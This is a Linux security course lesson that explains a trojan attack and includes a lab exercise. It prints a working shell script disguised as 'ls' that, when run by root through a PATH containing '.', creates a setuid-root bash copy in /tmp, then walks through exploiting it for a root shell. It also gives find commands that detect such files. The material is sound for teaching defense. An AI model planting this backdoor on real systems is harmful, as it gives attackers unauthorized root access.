Lesson 10

Date: 4/2/2014
Basics of Linux Security
Linux for Engineering and IT Applications


Example of a Trojan


  • Assume, root has path set as follows: PATH=.:$PATH

  • Hacker puts the script in /tmp and gives it name ls

  • When root comes in /tmp and executes ls it creates a back door for the hacker.

  • When a user executes /tmp/.sh -p he becomes root. 
    • #!/bin/sh

who=`whoami`

# check if I am the root:

if [ "$who" = "root" ]
then
cp /bin/bash .sh
chmod 4755 .sh
/bin/rm ls
fi

/bin/ls $*
  • This trojan can be found with find command: 
    
find /tmp -type f -perm /u=s,g=s -ls
    		or 
    
find /tmp -type f -perm /6000 -ls
  • Very often, Trojans come with a new software. Verify developers signatures using checksums or GPG/PGP tools.
    Exercise
    Perform the exercise below on smbhost VM that you have deployed in the previous lesson. 
    virsh start smbhost
    Figure out the IP address of smbhost: 
    grep smbhost /var/lib/libvirt/dnsmasq/default.leases
    Initiate two SSH conections to smbhost from the different terminal windows. For example, the IP address of smbhost is 192.168.122.42. 
    ssh 192.168.122.42
    Do the same SSH command in the other terminal window.
    While login as user hostadm, create the script, ls, in /tmp, then 
     
chmod 755 ls
    In the other terminal, become root 
     
sudo -s
    Modify your path variables by including ".", step into /tmp, and execute command ls: 
    export PATH=.:$PATH 
cd /tmp
ls
exit
    In the other terminal window, where the user is not root, hostadm, 
     cd /tmp 
/tmp/.sh -p
    then see what happens.
    When you finish with the exercise, DON'T FORGET to remove /tmp/.sh !!!

    • Take me to the Course Website